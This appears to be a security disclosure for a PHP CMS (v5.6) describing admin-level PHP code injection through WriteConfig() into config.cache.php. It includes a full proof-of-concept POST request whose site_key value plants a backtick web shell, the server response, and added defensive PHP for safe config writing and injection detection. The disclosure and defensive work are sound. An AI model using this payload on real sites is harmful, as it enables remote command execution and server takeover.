#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Submit date: 22/08/2021
#Condition: Admin user
#Version: v5.6
#Description:
Because the input is filtered without removing "<, >, ?, =, `, ..." in the WriteConfig() function, the attacker can inject PHP code into the /include/config.cache.php file. The attacker can append ?> to close the PHP syntax and add new PHP functions.
In /admin/site_save.php file
WriteF() function:
### PoC:
In config.cache.php file
Then back to .php files in /admin/ directory to execute code
### Request

```http
POST /admin/site_save.php HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: http://172.16.0.12:2222
Connection: close
Referer: http://172.16.0.12:2222/admin/site_add.php
Cookie: PortalOpenEMR=BKEx0ZLJ9X41gReq-UHNt-aC0jHNPiQLUOf7FXckqCAumudg; OpenEMR=UwreHaTw9iqwJWXqAY3%2CWYkZgvA3wdVmymdC5QqiVC1H2scM; loader=loaded; admin_lang=cn; home_lang=cn; workspaceParam=users_index%7CMember; referurl=%2Findex.php%3Fm%3Duser%26c%3DUsers%26a%3Dcentre; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; users_id=1; PHPSESSID=qhclrgdoah7rbv9l34fvj07h00
Upgrade-Insecure-Requests: 1

site_name=123&site_key=kietna?><?=`$_GET[0]`?><?&site_lang=testtest&webname=123&weburl=http%3A%2F%2F172.16.0.12%3A2222&webpath=123&webswitch=Y&action=add
```
### Response

```http
HTTP/1.1 200 OK
Date: Sun, 22 Aug 2021 07:54:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12942

<script type="text/javascript">window.top.location.reload();</script>
```
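The defensive side of the bug described above, as an added example that is not part of the report and not the project's own code: a config writer that serializes values with var_export() so a value containing `?>` stays a string literal, plus a tokenizer check that flags a config.cache.php carrying a second open tag, a close tag or inline HTML. The function names are hypothetical; the project's WriteConfig() and WriteF() are not reproduced here.

```php
<?php
// Added example, not the project's WriteConfig()/WriteF(); names are hypothetical.

// Hardened writer: var_export() emits every value as an escaped PHP literal,
// so a value such as "kietna?><?=`$_GET[0]`?><?" stays inside a quoted
// string and never terminates the PHP block.
function writeConfigSafe(array $cfg, string $path): void
{
    $src = "<?php\nreturn " . var_export($cfg, true) . ";\n";
    // Write to a temp file, verify it parses back to the same data, then
    // move it into place atomically so the live config is never half-written.
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, $src, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    if (configLooksInjected($src) || (include $tmp) !== $cfg) {
        unlink($tmp);
        throw new RuntimeException('config round-trip check failed');
    }
    rename($tmp, $path);
}

// Integrity check for an existing or freshly generated config file: a clean
// file has exactly one open tag and no close tag or inline HTML. A breakout
// like the one reported leaves extra T_OPEN_TAG / T_OPEN_TAG_WITH_ECHO,
// T_CLOSE_TAG or T_INLINE_HTML tokens behind, which this check detects.
function configLooksInjected(string $src): bool
{
    $opens = 0;
    foreach (token_get_all($src) as $tok) {
        if (!is_array($tok)) {
            continue;
        }
        if ($tok[0] === T_OPEN_TAG || $tok[0] === T_OPEN_TAG_WITH_ECHO) {
            $opens++;
        } elseif ($tok[0] === T_CLOSE_TAG || $tok[0] === T_INLINE_HTML) {
            return true;
        }
    }
    return $opens !== 1;
}

// Constructed input that reuses the site_key value from the report above.
$cfg = ['site_name' => '123', 'site_key' => 'kietna?><?=`$_GET[0]`?><?'];
$path = sys_get_temp_dir() . '/config.cache.php';
writeConfigSafe($cfg, $path);
$loaded = include $path;
var_dump($loaded['site_key'] === $cfg['site_key']);        // value survives as data, not code
var_dump(configLooksInjected(file_get_contents($path)));   // the written file has a single open tag
```

The tokenizer check can also be run on its own over an existing config.cache.php during incident triage, since a file that should contain only one `<?php` block will otherwise show additional open tags.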
KietNA-HPT changed the title from "PHP Code Execution via create new site function in site_save.php" to "PHP Code Execution via WriteConfig() function" on Aug 22, 2021.